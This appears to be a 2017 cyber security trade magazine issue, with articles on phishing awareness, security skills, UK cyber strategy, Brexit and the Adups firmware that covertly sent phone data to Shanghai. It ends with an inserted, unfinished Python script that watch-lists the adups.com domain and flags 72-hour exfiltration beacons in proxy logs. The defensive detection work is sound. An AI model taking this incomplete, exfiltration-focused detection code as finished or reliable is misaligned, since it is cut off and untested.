We detect advanced threats in seconds and neutralise them in milliseconds. www.foresttree.co.uk

A defence-grade cyber security product built for the Enterprise, Government and SME marketplaces. Our partner’s ground-breaking monitoring technology, built and improved over 20 years of securing the world’s most sensitive government and commercial information, protects you against the most sophisticated and advanced cyber threats. This, coupled with an enhanced Artificial Intelligence engine, allows Forest Tree to learn and become an increasingly more effective and efficient tool. The modular approach taken during the development of the Forest Tree solution ensures clients have high levels of personalisation available.


How to Tackle the Human Aspects of Cyber Security
Daryl Flack

About the Author: Daryl Flack is Co-founder and CIO of Blockphish and Security Lead for the Smart Metering Implementation Programme at the Department for Business, Energy and Industrial Strategy (BEIS). Previously, he was CIO of AXELOS, a joint venture between Capita Plc and the Cabinet Office.

Not a day goes by without another cyber breach hitting the news. Recently, we’ve seen breaches impact corporations, individuals and our political systems:
• €53 million stolen from an aerospace parts manufacturer via a phishing scam;
• The US elections potentially influenced following a hack on the Democratic National Committee;
• 1.5 billion individuals’ data stolen from Yahoo in two enormous breaches.

As the number of cyber-attacks increases, so does the potential negative impact on every one of us. If we are to reduce the frequency and volume of cyber breaches and the impact they have, then we are going to need to do more to tackle the human aspect of cyber security. The causes of these incidents may all be different; however, analysis shows that human actions are overwhelmingly at the heart of the vulnerabilities, and that attackers are actively seeking to exploit our human weaknesses to compromise target systems. Often this is done by tricking an employee through social engineering: by some estimates, up to 91% of cyber-attacks begin with a phishing or spear-phishing email. If we can reduce our susceptibility to these attack methods, it will significantly improve our cyber security.



The act of phishing is aimed at trying to solicit a response from a person or group of people via mediums such as:
• Email
• Text (also known as ‘smishing’)
• Phone calls / voicemails (also known as ‘vishing’)
• Social media, or
• A combination of some or all of the above.

The reason why this form of attack is so successful is that the structure and content of these communications are specifically designed to prey on basic human behaviours that we all exhibit. They borrow from the same techniques that people have used for centuries to try and influence others, either consciously or unconsciously. Some examples of the techniques include:
• An urgent request
• Instruction from someone in authority
• Curiosity
• Appealing to your compassion

If the subject matter is compelling enough, it can be hard to resist the urge to carry out the attacker’s request. Susceptible as we may be to our emotional responses, all is not lost. We are adept at assessing and understanding potential threats or risks. However, how people perceive threats can be subjective, based on their personal circumstances and the relevance of a threat to them. If we don’t appreciate the likelihood of a threat happening, then we’re less likely to adjust our behaviour. This is one of the challenges of tackling threats such as phishing: we don’t see a simple everyday task such as opening and responding to emails as being a threat. To address this, there needs to be a greater understanding of what the threat is, how it could affect us or the company, how we can help to stop it and, most importantly, a feeling that we have an active part to play. It’s this feeling of responsibility, i.e. an emotional response, that decides whether staff are an active part of your cyber defences or rather part of the vulnerability. Once you have that basic principle instilled, how do you ensure you have the right awareness programme in place to effect real changes in your staff’s behaviour? There are some basic principles that can help in this regard.

MEASURABLE
• Whatever learning you provide needs to be measurable, so you can identify what works and what doesn’t.
• Be willing to take on feedback from your staff and change your approach accordingly.

This is also where ethical phishing campaigns, if tailored to suit your organisation and carried out correctly, can have a huge benefit. By sending staff an initial ethical phishing email to establish a baseline at the outset, you can then follow up regularly with both ‘all staff’ campaigns and campaigns aimed at specific teams (spear phishing) or individuals (whaling), based on the risks you face. This will provide you with insights into the effectiveness of your training.

REGULAR AND CONCISE
• Delivering a one-hour session once a year won’t have a positive impact or change behaviours for the better. Awareness learning content should be delivered in short modules, ideally of 1 to 2 minutes and never more than 10: small nuggets of information that people can consume frequently without it affecting their productivity, but which allow them to internalise the key messages.

ADAPTIVE, PERSONALISED AND APPROPRIATE
• The content should use understandable language and be relevant to the audience. People won’t engage in the learning if they don’t understand how the concept or the scenarios it portrays are relevant to them or their role. The learning should be tailored to staff role, knowledge and skill levels. Consider short quizzes prior to assigning learning content for staff to complete. This will enable you and the staff to see if they already have the requisite knowledge in one area, and allow them to focus their learning on areas in which they are less proficient.



UTILISE DIFFERENT LEARNING FORMATS •

Different people learn in different ways and at different speeds. This needs to be allowed for with different content types and delivery methods to provide accelerated learning.

Consider content such as videos, animations, games, simulations blended with traditional Learning.

Blend electronic learning with physical delivery mediums and communications such as lunch and learns, posters and other rich graphical content identifying the highest risks and threats. Specific breakout sessions with guest speakers work well too. The subject areas here can cover non-corporate areas of focus such as securing your Facebook profile or guidance around online shopping. By making some aspects of the subjects relevant to people in their personal lives, they’ll be more likely to adopt those good behaviours in their corporate lives.

TRY TO MAKE IT ENGAGING, COMPETITIVE AND ENJOYABLE

This is where the real behaviour changes can happen, because if people enjoy something, they’re much more likely to remember it.

Consider using incentives and rewards. This can be anything from utilising points and leaderboards to encourage competition, to providing a sense of achievement or status. Recognition via benefits can be used too, such as small pay awards for those with the budget, although non-financial incentives such as additional annual leave or specific mentions in annual appraisals can work just as well.

CYBER WORLD




A good approach is to start out in a single risk area such as phishing and grow it over time to include other areas such as password security, social media, information handling and other relevant subjects. Ultimately, your staff can be one of your strongest defences against cyber-attacks. However, for you to make the most of this potential, your staff will need to:

• Feel it’s their responsibility to understand the threats and protect the company.
• Feel confident they’ve had the necessary training to know what to look for in a potential attack.
• Be vigilant in spotting attempted attacks.
• Be diligent in reporting anything suspicious.

Technology will always be the first line of defence and is incredibly valuable in protecting your organisation, but there will be times when the attackers get through. Then your staff are your last line of defence. Only once you have a cyber-aware workforce, with a security culture embedded within your organisation, can you be confident in your ability to be resilient to the cyber threats you face.


Daryl Flack, Co-founder and CIO of Blockphish



Key Cyber Security Skills in the Digital Age Kevin Murphy



About the Author: Kevin Murphy (CISM, CISSP, CESP, CEH, ISO27001) is a Cyber Security, Risk and Privacy Specialist at the Royal Bank of Scotland and president of the ISACA Scottish Chapter. He has more than 25 years of experience in enterprise IT processes and systems, serving clients across all service lines in IT strategy, architecture, IT planning and project management, IT effectiveness and process improvement, systems lifecycles and operations. A former police officer, Murphy received a Chief Constable’s commendation for a career that included front-line policing, e-crime and drug enforcement. Moving into consultancy, Murphy was quickly nominated by the prestigious SC Magazine as one of the top emerging cyber security professionals in Europe.

In the past five years, we have seen the decline of ‘Information Protection’ and the rise of ‘Cyber Security’; the terms ‘Digital Age’ and ‘Internet of Things’ firmly established in our professional lexicon; the continued evolution of the cloud; and the immediate spectre of quantum computing as the next great technological advancement. By any measure, the cyber security professional is working within a whirlwind of change, the only true constant being humans (for now!) acting as the initiators of this change. The question can therefore be asked: what skills does the cyber security professional require to remain relevant in the workplace? Three core skills are required for a successful career now and for the foreseeable future.

KNOW YOUR BUSINESS

A first requirement is an understanding of the business for which cyber professionals are responsible. Whether this be banking, pharmaceuticals or oil and gas, cyber security professionals cannot be truly effective by simply overlaying generic controls on their environment to protect the information for which they are responsible. This will inevitably lead to gaps and inconsistencies, as some solutions will not be a natural fit for the business model or culture. The control environment should be shaped by the business context.

The key business drivers will affect the decision-making process, inform the overall culture and translate into a risk appetite which will determine what controls are invested in and applied. How does the cyber security professional obtain this perspective? A mix of academic and experiential learning is a good approach. Firstly, no matter what industry you operate in, there will likely be introductory qualifications you can take to gain a better understanding of the business. For example, the ‘Professional Banker Certificate’ offered by the Chartered Banker Institute is a good introduction to the core concepts of banking. There are no entry requirements for the qualification and it generally requires only a few weeks of self-study. Gaining a professional qualification also demonstrates your commitment to your business environment and increases your credibility with stakeholders when engaged in debate.

Business credibility can help gain access to the second key area in developing business knowledge: experiential learning. Though many of us may view our audit colleagues with trepidation, audit remains one of the best areas in an organisation in which to gain an insight into the business and develop business knowledge. Any cyber security professional would benefit from a secondment or shadowing opportunity within an audit function. Primarily, audit will provide exposure to a range of issues facing the organisation, thereby offering the cyber security professional a holistic view when providing control assessments and solutions. Secondly, any professional would benefit from audit experience: developing a cogent writing style, applying an investigative methodology, presenting fact-based conclusions, and the experience of having difficult conversations with positive outcomes are all valuable skills gained by the audit professional.

The cyber security professional should not limit his or her experience to audit. Key skills can also be obtained by working in the risk function, thereby understanding the concepts of key risk indicators, key performance indicators and risk appetite statements, all important aspects when documenting a business case and detailing the return on investment should a particular security solution be advanced. Other areas of note include Human Resources and Marketing, to understand how personal information is handled and secured. In sum, the cyber security professional should maintain a healthy interest in all business functions to ensure an effective understanding of the information lifecycle.

KNOW THE RISKS

The second requirement to remain effective in the workplace is for the cyber security professional to maintain a base level of subject matter expertise. The diverging and increasingly sophisticated forms of technology, ranging from cloud to quantum computing, will make it increasingly difficult for the cyber security professional to specialise in more than one discipline. Their role will therefore evolve into becoming an informed interface between technology and business stakeholders. To be effective in this ‘nexus’ function, the cyber security professional will require a common denominator of subject matter expertise. The globally recognised qualifications offered by ISACA are a good step in this direction, particularly the CSX Practitioner, CISM and CRISC designations.

But what defines a ‘base level of expertise’? The cyber security professional should consistently review the risk landscape and challenge whether they have the expertise to provide informed comment on the threats an organisation faces. For example, in the previous decade, countering fraud and money laundering was a major area of focus for the regulator. Now, it can be argued that with the EU General Data Protection Regulation, an understanding of the data lifecycle in an organisation is fundamental to the role of the cyber security professional. ‘Privacy’ can no longer be seen as distinct from cyber security, since a key tenet of the legislation is how the confidentiality, integrity and availability of personal information are maintained.

So, what are the risks in the foreseeable future? It is likely that with the onset of quantum computing, the cyber security professional will require a more detailed understanding of cryptography as organisations move from classical computing to a world in which many current forms of encryption, in particular the public-key schemes that underpin today’s key exchange and digital signatures, are obsolete. The cyber security professional will have a key role in managing this transition and interfacing with technology providers, business stakeholders, the privacy team, the legal department and more.

FEBRUA RY 2 017

40


KNOW YOURSELF

What will enhance the cyber security professional’s ability to interface with such a diverse range of stakeholders on a myriad of subjects? Excellent interpersonal skills will clearly be at a premium. How quickly can you synthesise many sources of information, then deliver this effectively in one paragraph or a five-minute pitch to the executive? To ensure these skills remain effective, the cyber security professional has a responsibility to be objective in assessing his or her abilities and should consistently strive to improve. This development can be aided by employing the help of a more experienced mentor. Thankfully, many professional organisations now offer mentoring as part of their training environment. When development areas have been identified, the next step is to build these into an action plan with set goals and timeframes. Key to this process is the ability to practise these skills in a safe environment. For example, if you are nervous about an upcoming presentation to the board, practise first in front of your colleagues and slowly build that experience in a constructive environment. Also, volunteer for activities which use the skills you need to acquire, as you will quickly develop confidence with practice. If these activities cannot be found in your organisation, ISACA has a designated area of its website where many opportunities can be found; these range from the development of academic programmes to organising the next international conference. Finally, the value of being able to travel and work in different jurisdictions should not be understated. Drawing on our earlier discussion regarding business culture and its linkage to risk appetite, the opportunity to work in different parts of the world can provide invaluable experience, both in broadening your interpersonal skills in how you interact with others and in providing different approaches to common problems.



THE TAKEAWAY

The role of the cyber security professional is unique: what other position requires conversations with so many other areas of the organisation? What profession encompasses such a range of topics, from adequate fencing to cryptographic algorithms? Or skills that include presenting to an audience of 100 people and providing a one-paragraph summary for a press release?

Presented like this, the cyber security profession can be exciting and daunting in equal measure. To help navigate these challenges effectively, professionals must understand their business and know the risk environment to the extent that they can provide an informed opinion. Ultimately the cyber security professional is a leader who should role-model the values of continual improvement, be solution-orientated, always act in the best interests of the organisation, and help any colleague who requires assistance.


Kevin Murphy Cyber Security, Risk and Privacy Specialist at RBS



Expert Opinion Talal Rajab



A techUK Analysis of the UK Government’s National Cyber Security Strategy

About the Author: Talal Rajab is the Head of Programme for techUK’s Cyber and National Security programmes. He manages strategic relationships between Government and industry members on cyber and national security related issues, in particular through the Cyber Growth Partnership. He also leads techUK’s work on the Investigatory Powers Bill. He has a parliamentary background, having joined techUK from the Industry and Parliament Trust (IPT), where he managed the IPT’s business relations and led on the Trust’s Cyber Security Commission.

On Tuesday 1 November 2016, the UK Government announced the publication of its National Cyber Security Strategy. Underpinned by a £1.9bn investment, it sets out how the UK will use automated defences to defend citizens and businesses against growing cyber threats, support the UK’s growing cyber security industry, develop a world-class cyber workforce and deter cyber-attacks from criminals and hostile actors. The Government would be the first to admit that past policies on cyber security have not achieved the scale and pace of change required to stay ahead of the ever-changing cyber threat. For many digital services and products emerging on the market today, security has been an afterthought. Too many organisations are suffering basic breaches, too few investors are willing to risk supporting entrepreneurs in the sector, and there is a lack of graduates and others with the right skills emerging from the education and training system. To address these failures, the new £1.9bn Strategy will focus on three key themes:

DEFEND: This strand of the Strategy, focusing primarily on the UK’s critical national infrastructure, aims to ensure that the UK has the means to defend itself against evolving cyber threats, to respond effectively to incidents and to ensure UK networks, data and systems are protected and resilient. In this regard, the new National Cyber Security Centre (NCSC) will provide leadership to industry on key national cyber security issues, and work with the Ministry of Defence (MoD) to help the Armed Forces respond to a potential, significant national cyber attack through active cyber defence (ACD) measures. The ‘Defend’ strand of the Strategy will also focus on ensuring that all government digital services built or procured have security ‘built in by design’, working closely with the Government Digital Service (GDS) and the Crown Commercial Service (CCS), as well as with NHS Digital, in order to implement new data security standards. This is an area that techUK will look at increasingly in 2017, ensuring that the Government’s digital transformation agenda is underpinned with security.

DETER: The ‘Deter’ strand of the Strategy will be led by the intelligence agencies, the Ministry of Defence, law enforcement and the National Crime Agency, in coordination with international partner agencies. It will see the Government investing in detecting, understanding, investigating and disrupting hostile actions taken against businesses and the public sector, pursuing and prosecuting cyber criminals whilst reserving the right to take offensive action in cyberspace. One of the main objectives of this strand of the Strategy is to reduce cybercrime. Law enforcement has traditionally been underfunded in this regard, as highlighted by techUK’s recent ‘Partners Against Crime’ report, so it is good to see a commitment to enhancing law enforcement’s capabilities and skills at a national and local level, as well as establishing a new reporting system in order to share information across law enforcement in real time. Interestingly, the strategy recognises the importance of encryption to the protection of the UK’s most sensitive information and stresses that the UK will continue to maintain its sovereign capability in this area, whilst working with industry to ensure that there are no ‘safe spaces for…criminals to operate beyond the reach of the law’.

DEVELOP: This strand of the Strategy will focus on growing the UK’s cyber security industry, investing in accelerator programmes, scientific research and skills. At its heart, the Strategy highlights the creation of two new cyber innovation centres to drive the development of cutting-edge cyber products and dynamic new cyber security companies, giving companies the assistance they need to get their first customers and attract further investment. A proportion of the £165m Defence and Cyber Innovation Fund will be allocated to support innovative procurement in defence and security, as well as the provision of testing facilities for companies to test their products. The Government will also support the creation of a growing cyber security sector, helping UK companies and academics develop the commercial and entrepreneurial skills required to grow. Reassuringly, the Strategy also makes reference to the collective expertise of the Cyber Growth Partnership (CGP), for which techUK continues to provide the secretariat, in order to focus further growth and innovation interventions. On the topic of cyber security skills, the strategy sets out a long-term skills project that builds on existing work to integrate cyber security into the curriculum, so that everyone studying computer science, technology or digital skills will learn the fundamentals of cyber security. This effort will also attempt to address the gender imbalance in cyber professions and to bring in people from more diverse backgrounds, and will be spearheaded by a cyber skills advisory group made up of government, employers, professional bodies and education providers.



INTERNATIONAL ACTION

Finally, the strategy recognises the importance of co-operation with international partners on cyber related issues. This includes an assurance that international law and human rights apply in cyberspace, a commitment to a multi-stakeholder model of internet governance, an opposition to data localisation and working towards the raising of cyber security capacity within partner countries. A large proportion of this section focuses on helping other countries develop and maintain their own cyber security, building their capacity to tackle cyber threats to the UK.

TECHUK RESPONSE

It is reassuring to see that, in its approach to cyber security standards within the digital economy, the Strategy takes an interventionist stance that aims to raise standards across the UK. The Government has admitted that a ‘market approach’ to the promotion of basic cyber security hygiene has in the past not produced the required pace and scale of change, with take-up of initiatives such as Cyber Essentials having been low. It is true that the market is not valuing and managing cyber risk correctly, and techUK therefore welcomes the recognition that businesses need to ‘up their game’ in regard to cyber security. The Government has a role to ‘set the pace’ and lead the way by bringing its influence and resources to bear to address cyber threats, though it cannot do this alone. The strategy is also a lot clearer, for the first time, about the nation state cyber threats facing the UK, and more confident and aggressive in its response to such threats. Whilst it could be argued that the strategy is too broad in certain areas, it is still good to see the Government aiming high and trying to ensure that the UK is a safer place to conduct digital business (though it will be difficult to cover all of the initiatives announced in a five-year plan).

One criticism, however, is the lack of recognition within the Strategy that much of the world’s innovation in cyberspace comes from the US and, increasingly, the Far East. The Government should commit more heavily to engaging with innovators around the world, which will in turn help UK companies grow. Overall, the Strategy is a robust and comprehensive response from Government to the growing cyber threats that we face. It is now time for businesses across the country to step up and play their part in keeping their businesses, and the UK as a whole, secure.

Talal Rajab, Head of Programme, Cyber & National Security



Secgate Technologies Fast Intelligent Protection At Secgate Technologies we deliver information technology and intelligence solutions that both strengthen and empower our clients’ IT security and resilience. Our tools give clients technology capabilities that allow them to analyse, correlate, identify and eliminate threats. We are industry experts and leading technologists who have built a suite of solutions with proven defensive capabilities that tackle IT threat detection, analytics and IT incident response. Our flagship product, Forest Tree, has been successfully deployed in a number of complex and unique environments. Part of the specialist advisory group Secgate, our clients include large enterprises, governments and SMEs.

www.secgate.co.uk/technologies



Rising Star Siming Wei



Rising Star is a new featured section of Cyber World. With our monthly interviews we introduce our readers to a promising rising star in the cyber security industry. We want to learn about what motivates these future leaders in the world of cyber, about their background, personal and professional development, specialisations and interests, as well as their goals for the future. We also ask them to offer some advice for the benefit of the next generation interested in entering careers in this fast-growing industry.

Siming Wei is a Cyber Security Senior Associate at PwC. She joined PwC after completing a master’s degree in Wireless and Optical Communications, and also holds a first-class degree in Electrical Engineering. She is currently studying part-time for a second master’s degree in Information Security at Royal Holloway, University of London.

Please tell us a bit more about yourself.

I joined the PwC Cyber Security Practice in 2014 after completing a master’s degree in Wireless and Optical Communications. Over the past two and a half years, I have really delved into the exciting world of cyber security, working on a variety of projects in areas ranging from information security management to identity and access management across a number of industries.

What made you choose a career in Cyber Security?

Making things happen and making things better always give me a great sense of satisfaction. This was the driving force behind my choosing a degree in engineering. With the inspiration to encourage more young people, and especially girls, to study STEM subjects, I became a STEM ambassador at university. This is where I encountered cyber security for the first time. Thanks to the IT-related modules in my degree, I was able to understand more about information technology and started to pay more attention to news concerning information security. Upon my graduation, and being attracted by the PwC brand, I went on the graduate recruitment website and found that they were recruiting graduates for cyber security roles. I always wanted to work in the technology field, so after doing some research on cyber security, I decided it is a very interesting field that offers a promising career.

What are the greatest positives about working in Cyber Security?

Cyber security as an industry is constantly growing and evolving with the rapid advance of new technologies. Therefore, the work is never boring and no two days are the same. Gaining exposure to different problems clients are facing and helping them solve these problems has been a very rewarding experience. Cyber security is becoming much more important to business, and thus it is a great pleasure to take part in shaping the cyber security world to enable business growth. It is exciting to work in a very diverse team of people from different backgrounds here at PwC. The amazing people I work with help me to learn new things every day.

What are the greatest challenges in Cyber Security?

Over the past few years, a few high-profile security incidents have caused both individuals and organisations to wake up to the importance of cyber security. We have seen quite a lot of organisations starting to seriously invest in cyber security. However, according to the Global State of Information Security Survey 2016, insider threats are still the top risk to organisations. Building the right culture to encourage employees to be secure is the biggest challenge. Organisations must realise that only investing in technologies will not be sufficient to improve the organisational information security posture. People, processes and technologies should all be considered when building and improving their information security capability overall.

What are the highlights of your career?

Joining PwC has been the biggest change in my life and is definitely a highlight in my career. The great opportunities and enormous support I received from the firm and colleagues have really helped me to learn and develop as a cyber security professional. Another highlight of my career has been working on the Cyber Security Challenge Masterclass 2016, which is the culmination of a national competition programme to identify new cyber security talent and was this year designed and hosted by PwC. It is run by Cyber Security Challenge UK, a non-profit organisation backed by the government and industry bodies. The event itself has helped to raise awareness in society, and encourage people – especially young people – to work in cyber security. It was an amazing experience to project manage this high-profile event and to be involved from the beginning to the end in game design, event management, marketing and PR for more than 6 months.

Where do you see Cyber Security in 10 years?

With the constantly changing landscape of threats, I believe that cyber security in 10 years will be very different from today. The Internet of Things, the Cloud and other new internet-based technologies, while introducing great convenience and productivity to our lives, can introduce new risks to cyber security and privacy. Cyber security practitioners and law enforcement agencies will need to respond to new challenges. With GDPR coming into force in 2018, organisations are required to do more to demonstrate they can safeguard the information they are handling. In 10 years, new regulations and industrial standards may be created to address cyber security in new technologies such as drones, driverless cars and smart homes.

What are your career ambitions?

Since cyber security is such a broad topic, it is very difficult to be an expert in all areas. With my experience growing, I would like to become a ‘go to’ person in a specific field of cyber security to solve some of the important problems in society. As I am still at the early stage of my career, I would like to build a good understanding of different areas in cyber security before choosing my areas of expertise. With the rapid advances in technology, there will be so many new risks to be mitigated and new assets to be protected in cyber security in 5-20 years. Therefore, I want to keep an open mind and be the best I can when opportunities arise.

What would you do if you were not a consultant?

I would probably be an electrical engineer in the renewable and green energy sector. I would love to use the knowledge and the problem-solving skills I acquired through my degree to tackle energy shortage and the pollution that comes with electricity generation.

What advice would you give young people hoping to enter a career in the field?

My advice for young people is to study what you are really passionate about and interested in. Follow your heart instead of your peers. Whatever you choose to study, the skills you develop are transferable and valued in cyber security. We have a very diverse team here in PwC and we value the different backgrounds and skills each individual brings to the team. Entering a career in cyber security will open up opportunities in many areas and on a wide range of issues. There are so many areas you can go into, such as penetration testing, digital forensics and information security governance. You can explore and specialise in the area you are interested in the most. All you need is to be open-minded and ready to learn.

Siming Wei, Cyber Security Senior Associate at PwC


Brexit could deal blow to UK’s Cyber Security Chris Luenen

About the Author: Chris Luenen is an experienced international security expert with over 10 years’ experience working in political foundations, academia and think tanks. He has worked with leaders in financial services institutions, industry and international organisations as well as senior politicians, journalists and academics.

The outcome of the recent referendum on the question of Britain’s membership of the European Union has many important implications. These range from the exact modalities of Britain’s future relationship with the EU and other EU member states, the free movement of labour on the continent, the continued stability of the UK housing market, financial services sector and the overall economy, to the question of the very future of Great Britain, and especially Scotland’s role in the Union. While many commentators have rightly pointed out that a very much under-appreciated aspect of Brexit concerns security, the issue of cyber security deserves particular attention in this context. In our increasingly interconnected world, cyber security concerns everyone, from states, large corporations and SMEs to individuals, and attacks and security breaches are on the rise worldwide. The number and severity of breaches recorded are unprecedented, and the culprits are diverse, ranging from the youthful hacker in his parents’ basement, criminal gangs, hacktivists and terrorists to state-sponsored hackers. The implications of a possible Brexit with regard to cyber security do not just touch on questions of the UK’s national security, but also on the continued competitiveness of the UK’s booming cyber security industry, one of the few remaining growth markets in a depressed global economy, as well as on the competitiveness and security of non-cyber related industries and services.



IMPACT OF A BREXIT ON THE UK’S CYBER SECURITY INDUSTRY

Cybercrime is best combated in partnership with others and by establishing strong and resilient cooperative mechanisms for doing so, and the EU has done much in recent years to raise the level of, and harmonise, cyber security capabilities, regulations, information sharing and cooperation, and to facilitate best practice, across the continent. As Britain’s future relationship with the EU remains uncertain, in the coming months and years it will have to redefine several aspects of a relationship that has previously been taken for granted. This will include a decision on its future relationship with the European Cybercrime Centre (EC3) and Europol, as well as with the European Union Agency for Network and Information Security (ENISA) and the newly created European Cyber Security Organisation. Irrespective of the specific details of its continued engagement with any individual EU agency, network or initiative, a full Brexit will at the very least mean that Britain will no longer have a say in devising any directives and policies the EU develops, and which will be implemented across Europe, and may be left having to play catch-up after the fact.

A particular uncertainty in this context relates to the adoption of the EU’s General Data Protection Regulation (GDPR) and the Data Protection Act (DPA). While these regulations will come into effect before the UK potentially departs from the EU, there will be no obligation for the UK to uphold them thereafter. Should the UK decide not to uphold these regulations, then it will become much more difficult, and costly, for UK companies to continue to do business in the EU on a par with their European partners and competitors, and to demonstrate compliance with its regulations and norms. Similarly, it is uncertain whether the UK will adopt the new directive on security of network and information systems (NIS), which entered into force across the European Union in August 2016.

FEBRUARY 2017



SHORTAGE OF CYBER PROFESSIONALS SET TO BECOME WORSE

While an argument could be made that the United Kingdom might currently be ahead of its European partners with regard to its overall cyber security posture and measures, this advantage is set to wane as the UK’s pool of talented cyber security professionals diminishes over time – a very real prospect should the UK decide to end, or restrict in any meaningful way, the free movement of labour between the UK and EU member states. According to Diane Miller of Northrop Grumman, a leading expert on the cyber profession, there is already an estimated shortage of 1.5 million cyber security professionals over the next five years, and new talent is not easy to come by. If travel restrictions were imposed, it would be significantly less attractive for talent to come and work, and build a career, in the UK.

LOSING ACCESS TO EU INVESTMENT

Yet another way in which the United Kingdom will find itself affected by a Brexit is through the loss of access to the EU’s substantially increased investments into cyber security in recent years. Leaving the European Union will cut the United Kingdom off from the Union’s funding streams for cyber security initiatives, companies, and technologies, including the recently announced, and major, Public Private Partnership (PPP) programme, which is set to raise an expected €1.8bn of investment in cyber security. When combined with the potential drop in the cyber security talent pool that the United Kingdom might experience in the years ahead, the loss of these advantages and funding streams will deal a big blow to the overall health and viability of the cyber security industry in Britain, and is unlikely to be compensated by investments from the UK government and private sectors.



CONCLUSION

How vulnerable we have all become to cyber crime should be clear at least since the US National Security Agency’s very own hacker group, the Equation Group, fell victim to a substantial security breach, having been hacked and some of its offensive toolkit of exploits and other cyber ‘weapons’ stolen and offered for auction, apparently by a previously unknown group of hackers calling itself The Shadow Brokers.

The future relationship between Britain and the EU, or even the trajectory for how Britain will seek to extricate itself from the EU and revise, rewrite or create new laws, regulations and new mechanisms for cooperation, remains very much uncertain. When considering the potential implications for both the EU’s and the UK’s national, economic and citizens’ personal security, the competitiveness and growth of their respective cyber security industries and many related issues, there is not much room for error.


Chris Luenen Operations Director at Secgate


Leron Zinatullin is an experienced risk consultant, specialising in cyber security strategy, management and delivery. He has led large scale, global, high value security transformation projects with a view to improving cost performance and supporting business strategy. He has extensive knowledge and practical experience in solving information security, privacy and architectural issues across multiple industry sectors.

Order now at Amazon

The Psychology of Information Security

In today’s corporations, information security professionals have a lot on their plate. In the face of constantly evolving cyber threats they must comply with numerous laws and regulations, protect their company’s assets and mitigate risks to the furthest extent possible.

The Psychology of Information Security redresses the balance by considering information security from both viewpoints in order to gain insight into security issues relating to human behaviour, helping security professionals understand how a security culture that puts risk into context promotes compliance.

Security professionals can often be ignorant of the impact that implementing security policies in a vacuum can have on the end users’ core business activities. These end users are, in turn, often unaware of the risk they are exposing the organisation to. They may even feel justified in finding workarounds because they believe that the organisation values productivity over security. The end result is a conflict between the security team and the rest of the business, and increased, rather than reduced, risk. This can be addressed by factoring in an individual’s perspective, knowledge and awareness, and a modern, flexible and adaptable information security approach. The aim of the security practice should be to correct employee misconceptions by understanding their motivations and working with the users rather than against them – after all, people are a company’s best assets. Based on insights gained from academic research as well as interviews with UK-based security professionals from various sectors, The Psychology of Information Security – Resolving conflicts between security compliance and human behaviour explains the importance of careful risk management and how to align a security programme with wider business objectives, providing methods and techniques to engage stakeholders and encourage buy-in.



Adups Firmware Vacuuming up Android Phone Data

Back in November, The New York Times reported that the security research firm Kryptowire discovered that ‘several models’ of Android phones were shipped with firmware installed that vacuumed up text messages, location data, IMEI and contacts, and then sent this information to a server in Shanghai every 72 hours, without the owner’s knowledge or consent. The firmware also allows the remote installation and execution of code, again without the owner's knowledge or consent. But there has been no follow-up on the story. In particular: is the firmware still on new phones being distributed, and on which models exactly? Who is recording this data and why?

The software in question is firmware that helps mobile carriers do over-the-air updates. The firmware with the recording features is aimed at the low-end Android market. We know that much. A researcher at Kryptowire discovered by accident that a BLU R1 HD phone he purchased was connecting to IP addresses at adups.com and other domains. So he conducted further analysis and found that the phone was transmitting data in JSON format using a REST web service call. He then investigated what data the phone was transmitting.

Kryptowire says that Adups claims on its website that it has 700 million active devices in the field and a market share of over 70% in 150 countries. Its phones are integrated with 400 wireless carriers. The phones with the firmware were sold on Amazon and Best Buy. Adups provides software to two Chinese cell phone manufacturers: ZTE and Huawei. But those stats are only from ‘old’ information and sources. What we do not have is a list of which phones are affected right now. Adups also provides big data services to its customers.

Obviously the question poses itself whether this is a Chinese government effort to spy on its citizens or just bad planning by the manufacturer. The New York Times quoted Adups as saying that the software was written ‘at the request of an unidentified Chinese manufacturer’ and that the company wanted the data for customer support and to block spam calls and texts. The New York Times wrote: ‘The American authorities say it is not clear whether this represents secretive data mining for advertising purposes or a Chinese government effort to collect intelligence.’ The Adups attorney responded by stating that ‘this is a private company that made a mistake.’

Kryptowire only tested one phone. And Huawei and ZTE have not produced a list of which phones have this version of the firmware installed. BLU is an American company and has already removed the firmware. Google told Adups to remove any feature that uses Google Play Services. But Google does not operate in China – Google Play Services is used by Android programmers to do things like integrate with Google Maps and share objects. But it is not required to write an Android app, and this firmware is not an Android app but firmware, meaning software programmed at a level below the OS. So Android would not have access, and Google’s action would have changed nothing. So the obvious conclusion is that there are phones out there still vacuuming up data and sending it to Adups in Shanghai. How many of these are in the USA or Europe is impossible to know for sure. We have no list. And Kryptowire only tested one phone. Tom Karygiannis, VP of Products, stated: ‘I am pretty sure they are in the Chinese market. There are more devices that I am sure they have it. But we would have to test it in our labs to know.’
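From a defender's point of view, the behaviour described above (a REST call to an adups.com host on a fixed ~72-hour schedule) is detectable in egress logs. The script below is an added example, not code from the article or from Kryptowire: it flags any client contacting the adups.com domain and any client/destination pair that beacons at the reported interval; the log format, client addresses and the bigdata.adups.com hostname are constructed assumptions.

```python
"""Added example (not from the article or Kryptowire): flag devices that
contact the adups.com domain and/or beacon on a fixed ~72-hour schedule.
Log format, client IPs and the bigdata.adups.com host are constructed."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed egress-proxy log: "<ISO timestamp> <client IP> <destination host>"
SAMPLE_LOG = """\
2017-02-01T03:00:00 10.0.0.12 bigdata.adups.com
2017-02-01T09:15:00 10.0.0.12 maps.googleapis.com
2017-02-04T03:01:00 10.0.0.12 bigdata.adups.com
2017-02-05T18:40:00 10.0.0.12 example.org
2017-02-07T02:59:00 10.0.0.12 bigdata.adups.com
2017-02-10T03:00:30 10.0.0.12 bigdata.adups.com
2017-02-01T08:00:00 10.0.0.33 example.org
2017-02-02T08:05:00 10.0.0.33 example.org
2017-02-09T11:00:00 10.0.0.33 example.org
"""

WATCHLIST = ("adups.com",)  # parent domain named in the article
EXPECTED_PERIOD_H = 72.0     # reporting interval named in the article

def parse_log(text):
    """Yield (timestamp, client, host) from the constructed log format."""
    for line in text.splitlines():
        if line.strip():
            ts, client, host = line.split()
            yield datetime.fromisoformat(ts), client, host

def on_watchlist(host):
    """True for the watched domain itself or any of its subdomains."""
    return any(host == d or host.endswith("." + d) for d in WATCHLIST)

def find_beacons(text, period_h=EXPECTED_PERIOD_H, tol_h=1.0, min_hits=3):
    """Return [(client, host, mean_gap_hours, reasons)] for suspicious pairs.

    A pair is 'periodic' when it has at least min_hits contacts whose gaps
    average within tol_h of period_h and vary by no more than tol_h."""
    contacts = defaultdict(list)
    for ts, client, host in parse_log(text):
        contacts[(client, host)].append(ts)
    findings = []
    for (client, host), stamps in sorted(contacts.items()):
        stamps.sort()
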